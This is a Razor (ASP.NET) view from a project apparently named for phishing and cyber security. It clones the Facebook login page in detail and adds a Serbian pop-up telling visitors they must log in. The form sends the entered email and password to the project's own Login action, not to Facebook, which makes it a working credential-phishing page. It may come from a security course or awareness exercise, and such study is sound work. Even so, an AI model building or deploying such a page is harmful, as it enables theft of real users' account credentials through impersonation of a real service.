@page
@model Phishing_Sajber_Bezbednost.Models.FacebookLoginModel
@{
    Layout = null;
}

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <title>Facebook – log in or sign up</title>
    <link rel="stylesheet" href="~/css/fb-login.css" />
    
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta charset="utf-8">
    <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer">
    <script nonce="">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiXqP9EL_olo3bRvVw","stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AUUuke6KzUIqYG6aQ8J41JEi_S8","isCQuick":false,"brsid":"7494610030273318998","promise_include_trace":false});</script>
    <script nonce="">window.openDatabase&&(window.openDatabase=function(){throw new Error()});</script>
    <script nonce="">_btldr={};</script>
    <script nonce="">(function(){function a(a){return a.parentElement!==document.body&&a.parentElement!==document.head}function b(a){return a.nodeName==="SCRIPT"||a.nodeName==="LINK"&&((a=c(a))==null?void 0:a.asyncCss)}function c(a){return!(a.dataset instanceof window.DOMStringMap)?null:a.dataset}function d(d){var e;try{if(d.nodeType!==Node.ELEMENT_NODE)return}catch(a){return}if(a(d)||!b(d))return;var f=(e=c(d))==null?void 0:e.bootloaderHash;if(f!=null&&f!==""){var g=null,h=function(){window._btldr[f]=1,g==null?void 0:g()};g=function(){d.removeEventListener("load",h),d.removeEventListener("error",h)};d.addEventListener("load",h);d.addEventListener("error",h)}}Array.from(document.querySelectorAll('script,link[data-async-css="1"]')).forEach(function(a){return d(a)});var e=new MutationObserver(function(a,b){a.forEach(function(a){a.type==="childList"&&Array.from(a.addedNodes).forEach(function(a){d(a)})})});e.observe(document.getElementsByTagName("html")[0],{attributes:!1,childList:!0,subtree:!0})})();</script>
    <style nonce=""></style>
    <script nonce="">__DEV__=0;</script>
    <noscript><meta http-equiv="refresh" content="0; URL=/?_fb_noscript=1" /></noscript>
    <link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/?is_workplace_mobile_pwa_dogfooding=0" crossorigin="use-credentials">
    <title id="pageTitle">Facebook - log in or sign up</title>
    <meta name="bingbot" content="noarchive">
    <meta property="og:site_name" content="Facebook">
    <meta property="og:url" content="https://www.facebook.com/">
    <meta property="og:image" content="https://www.facebook.com/images/fb_icon_325x325.png">
    <meta property="og:locale" content="en_US">
    <link rel="alternate" media="only screen and (max-width: 640px)" href="https://m.facebook.com/">
    <link rel="alternate" media="handheld" href="https://m.facebook.com/">
    <meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know.">
    <script type="application/ld+json" nonce="">{"\u0040context":"http:\/\/schema.org","\u0040type":"WebSite","name":"Facebook","url":"https:\/\/www.facebook.com\/"}</script>
    <link rel="canonical" href="https://www.facebook.com/">
    <link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yx/r/e9sqr8WnkCf.ico">
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v5/yF/l/0,cross/xz891lDpbVV.css" data-bootloader-hash="fJuC8BV" crossorigin="anonymous">
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v5/yb/l/0,cross/AaZAHm4fzAe.css" data-bootloader-hash="uqQi0ZE" crossorigin="anonymous">
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v5/yg/l/0,cross/lbe8PImWO5f.css" data-bootloader-hash="fMiX0JK" crossorigin="anonymous">
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v5/yH/l/0,cross/M8hCN_gO0fP.css" data-bootloader-hash="sT6YoQH" crossorigin="anonymous">
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yv/r/38iJBCbqU_Z.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yv/r/38iJBCbqU_Z.js" async="" crossorigin="anonymous" data-bootloader-hash-client="7GuiAKk"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4i7M54/yq/l/en_US/ZoRrZUauHNU.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4i7M54/yq/l/en_US/ZoRrZUauHNU.js" async="" crossorigin="anonymous" data-bootloader-hash-client="g9RYmWQ"></script>
    <link rel="stylesheet" type="text/css" href="data:text/css; charset=utf-8," crossorigin="anonymous">
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yu/r/xOsYdAy1DIT.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yu/r/xOsYdAy1DIT.js" async="" crossorigin="anonymous" data-bootloader-hash-client="hSOCwPb"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yj/r/CA1slfevTeZ.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yj/r/CA1slfevTeZ.js" async="" crossorigin="anonymous" data-bootloader-hash-client="RFldPQq"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yn/r/CcWjrd6IWm3.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yn/r/CcWjrd6IWm3.js" async="" crossorigin="anonymous" data-bootloader-hash-client="RcfB/ZS"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yk/r/P4H8kjz6Lg3.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yk/r/P4H8kjz6Lg3.js" async="" crossorigin="anonymous" data-bootloader-hash-client="fxmPAvO"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yt/r/7deiYnaK7oh.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yt/r/7deiYnaK7oh.js" async="" crossorigin="anonymous" data-bootloader-hash-client="AvRy3Z2"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/y9/r/qetfxZizIhM.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/y9/r/qetfxZizIhM.js" async="" crossorigin="anonymous" data-bootloader-hash-client="IjugNeq"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yh/r/qkqnWEiZRwq.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yh/r/qkqnWEiZRwq.js" async="" crossorigin="anonymous" data-bootloader-hash-client="z3hBw8h"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yX/r/IdNYBa7WmBi.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yX/r/IdNYBa7WmBi.js" async="" crossorigin="anonymous" data-bootloader-hash-client="yRpdWFZ"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yG/r/ml61hhqKOR8.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yG/r/ml61hhqKOR8.js" async="" crossorigin="anonymous" data-bootloader-hash-client="tADNV/7"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yX/r/R7paD7vUTA2.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yX/r/R7paD7vUTA2.js" async="" crossorigin="anonymous" data-bootloader-hash-client="8Rq5kp2"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yi/r/fcnDhCsH9cT.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yi/r/fcnDhCsH9cT.js" async="" crossorigin="anonymous" data-bootloader-hash-client="Uh9zPeg"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yr/r/soPz6CQaB0x.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yr/r/soPz6CQaB0x.js" async="" crossorigin="anonymous" data-bootloader-hash-client="cmnrpD1"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yl/r/nv4EITsCAqt.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yl/r/nv4EITsCAqt.js" async="" crossorigin="anonymous" data-bootloader-hash-client="HhT0Sut"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yW/r/rhZUiD8hJ72.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yW/r/rhZUiD8hJ72.js" async="" crossorigin="anonymous" data-bootloader-hash-client="zLQaNdg"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yJ/r/TJc3tU-0fV-.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yJ/r/TJc3tU-0fV-.js" async="" crossorigin="anonymous" data-bootloader-hash-client="T9BkhW+"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yS/r/ui2DkP-wt_7.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yS/r/ui2DkP-wt_7.js" async="" crossorigin="anonymous" data-bootloader-hash-client="I+GHswV"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yO/r/_tJ17sGyxOX.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yO/r/_tJ17sGyxOX.js" async="" crossorigin="anonymous" data-bootloader-hash-client="zPYlTyl"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yE/r/ypXu_iewNxo.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yE/r/ypXu_iewNxo.js" async="" crossorigin="anonymous" data-bootloader-hash-client="H3fxfLR"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yc/r/qKoc-Mbxs0z.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yc/r/qKoc-Mbxs0z.js" async="" crossorigin="anonymous" data-bootloader-hash-client="+XPUPYf"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/yr/r/U6MCBds3T2l.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/yr/r/U6MCBds3T2l.js" async="" crossorigin="anonymous" data-bootloader-hash-client="dEY7RHQ"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4ihVQ4/yC/l/en_US/vKjWcN1Y6wX.js" rel="preload" as="script" crossorigin="anonymous">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4ihVQ4/yC/l/en_US/vKjWcN1Y6wX.js" async="" crossorigin="anonymous" data-bootloader-hash-client="p+1OXu8"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v4/ye/r/xDgm3Tqkawr.js" rel="preload" as="script" crossorigin="anonymous">
    <link rel="stylesheet" href="~/css/M8hCN_gO0fP.css" />
    <script src="https://static.xx.fbcdn.net/rsrc.php/v4/ye/r/xDgm3Tqkawr.js" async="" crossorigin="anonymous" data-bootloader-hash-client="K1pGhOF"></script>

    <!-- Toastr library -->
    <link rel="stylesheet" href="~/lib/toastr/toastr.min.css" />
    
</head>
<body class="fbIndex UIPage_LoggedOut _-kb _605a b_c3pyn-ahh chrome webkit win x1 Locale_en_US cores-gte4 _19_u" dir="ltr">
    <div id="globalContainer" class="uiContextualLayerParent">
        <div class="fb_content clearfix " id="content" role="main">
            <div>
                <div class="_8esj _95k9 _8esf _8opv _8f3m _8ilg _8icx _8op_ _95ka">
                    <div class="_8esk">
                        <div class="_8esl">
                            <div class="_8ice">
                                <img class="fb_logo _8ilh img" src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg" alt="Facebook">
                            </div>
                            <h2 class="_8eso connect-with-friends">Connect with friends and the world around you on Facebook.</h2>
                        </div>
                        <div class="_8esn">
                            <div class="_8iep _8icy _9ahz _9ah-">
                                <div class="_6luv _52jv">
                                    <form class="_9vtf" data-testid="royal_login_form" asp-controller="Facebook" asp-action="Login" method="post" id="u_0_2_UT">
                                        <input type="hidden" name="jazoest" value="21028" autocomplete="off">
                                        <input type="hidden" name="lsd" value="AVoqUoybs2I" autocomplete="off">
                                        <div>
                                            <div class="_6lux">
                                                <input type="text" class="inputtext _55r1 _6luy" name="email" id="email" data-testid="royal-email" placeholder="Email or phone number" autofocus="1" aria-label="Email or phone number">
                                            </div>
                                            <div class="_6lux">
                                                <div class="" id="passContainer"><input type="password" class="inputtext _55r1 _6luy _9npi" name="password" id="pass" data-testid="royal-pass" placeholder="Password" aria-label="Password">
                                                    <div class="_9ls7 hidden_elem" id="u_0_3_yH">
                                                        <a href="#" role="button">
                                                            <div class="_9lsa">
                                                                <div class="_9lsb" id="u_0_4_0J">
                                                                </div>
                                                            </div>
                                                        </a>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        
                                        <input type="hidden" autocomplete="off" name="login_source" value="comet_headerless_login">
                                        <input type="hidden" autocomplete="off" name="next" value="">
                                        <input type="hidden" autocomplete="off" name="shared_prefs_data" value="">
                                        <div class="_6ltg">
                                            <button value="1" class="_42ft _4jy0 _6lth _4jy6 _4jy1 selected _51sy" name="login" data-testid="royal-login-button" type="submit" id="u_0_5_kb">Log In</button>
                                        </div>
                                        <div class="_6ltj">
                                            <a href="https://www.facebook.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzQ0OTc0MTYwLCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D&amp;ars=facebook_login&amp;next" id="u_0_6_7m">Forgot password?</a>
                                        </div>
                                        <div class="_8icz"></div>
                                        <div class="_6ltg">
                                            <a role="button" class="_42ft _4jy0 _6lti _4jy6 _4jy2 selected _51sy" href="/r.php?entry_point=login" ajaxify="" id="u_0_0_Ll" data-testid="open-registration-form-button">Create new account</a></div></form></div><div id="reg_pages_msg" class="_58mk"><a href="/pages/create/?ref_type=registration_form" class="_8esh">Create a Page</a> for a celebrity, brand or business.</div></div></div></div></div></div></div><div class=""><div class="_95ke _8opy"><div id="pageFooter" data-referrer="page_footer" data-testid="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://www.facebook.com/" title="German" id="u_0_7_+Y">Deutsch</a></li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/" title="Turkish" id="u_0_8_aX">Türkçe</a></li><li><a class="_sv4" dir="ltr" href="https://tr-tr.facebook.com/" title="Hungarian" id="u_0_9_7+">Magyar</a></li><li><a class="_sv4" dir="ltr" href="https://hu-hu.facebook.com/" title="Serbian" id="u_0_a_i5">Српски</a></li><li><a class="_sv4" dir="ltr" href="https://sr-rs.facebook.com/" title="Romanian" id="u_0_b_Hm">Română</a></li><li><a class="_sv4" dir="ltr" href="https://ro-ro.facebook.com/" title="Polish" id="u_0_c_RY">Polski</a></li><li><a class="_sv4" dir="ltr" href="https://pl-pl.facebook.com/" title="Croatian" id="u_0_d_bA">Hrvatski</a></li><li><a class="_sv4" dir="ltr" href="https://hr-hr.facebook.com/" title="Slovak" id="u_0_e_Cd">Slovenčina</a></li><li><a class="_sv4" dir="ltr" href="https://sk-sk.facebook.com/" title="Spanish" id="u_0_f_TI">Español</a></li><li><a class="_sv4" dir="ltr" href="https://es-la.facebook.com/" title="Portuguese (Brazil)" id="u_0_g_WP">Português (Brasil)</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fpt-br.facebook.com%2F&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_q5LivYeJ3VE sx_4917eb"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse in Video">Video</a></li><li><a href="https://about.meta.com/technologies/meta-pay" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.meta.com/" title="Check out Meta" target="_blank">Meta Store</a></li><li><a href="https://www.meta.com/quest/" title="Learn more about Meta Quest" target="_blank">Meta Quest</a></li><li><a href="https://www.meta.com/smart-glasses/" title="Learn more about Ray-Ban Meta" target="_blank">Ray-Ban Meta</a></li><li><a href="https://www.meta.ai/" title="Meta AI">Meta AI</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT3Es08UEEGDPYWNjBz5aWv5T9dRat2k2YPNZuv4AMlQHoyxpq0JCKFMReTeUZ3TAEKEaz1FOfzd5cGm220I3IdJ1PI7gXmdFwvlSQAdcgngN7pM24Kb0puG_0DHwVQMzjQwo1mGfgp8L4CC1Bl62HCHmQdZ4Z6Mk2bOiQ" title="Check out Instagram" target="_blank" rel="noreferrer nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.threads.net/" title="Check out Threads">Threads</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn how we collect, use and share information to support Facebook.">Privacy Policy</a></li><li><a href="/privacy/center/?entry_point=facebook_page_footer" title="Learn how to manage and control your privacy on Facebook.">Privacy Center</a></li><li><a href="https://about.meta.com/" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Advertise on Facebook.">Create ad</a></li><li><a href="/pages/create/?ref_type=site_footer" title="Create a page">Create Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a></li><li><a href="/policies/cookies/" title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a></li><li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Learn about Ad Choices.">Ad choices<i class="img sp_q5LivYeJ3VE sx_9544b5"></i></a></li><li><a data-nocookies="1" href="/policies?ref=pf" accesskey="9" title="Review our terms and policies.">Terms</a></li><li><a href="/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></li><li><a href="https://www.facebook.com/help/637205020878504" title="Visit our Contact Uploading &amp; Non-Users Notice.">Contact Uploading &amp; Non-Users</a></li><li><a accesskey="6" class="accessible_elem" href="/settings" title="View and edit your Facebook settings.">Settings</a></li><li><a accesskey="7" class="accessible_elem" href="/allactivity?privacy_source=activity_log_top_menu" title="View your activity log">Activity log</a></li></ul></div><div class="mvl copyright"><div><span> Meta © 2025</span></div></div></div></div></div></div>
    <script src="~/lib/jquery/dist/jquery.min.js"></script>
    <script src="~/lib/bootstrap/dist/js/bootstrap.bundle.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.min.js"></script>
    <script type="text/javascript">
        $(document).ready(function () {
            toastr.options = {
              "closeButton": true,
              "debug": false,
              "newestOnTop": false,
              "progressBar": true,
              "positionClass": "toast-top-right",
              "preventDuplicates": false,
              "onclick": null,
              "showDuration": "300",
              "hideDuration": "1000",
              "timeOut": "4000",
              "extendedTimeOut": "1000",
              "showEasing": "swing",
              "hideEasing": "linear",
              "showMethod": "fadeIn",
              "hideMethod": "fadeOut"
            }
            toastr.warning('Morate se ulogovati u svoj Facebook nalog.')
        })
    </script>
    
</body>
</html>
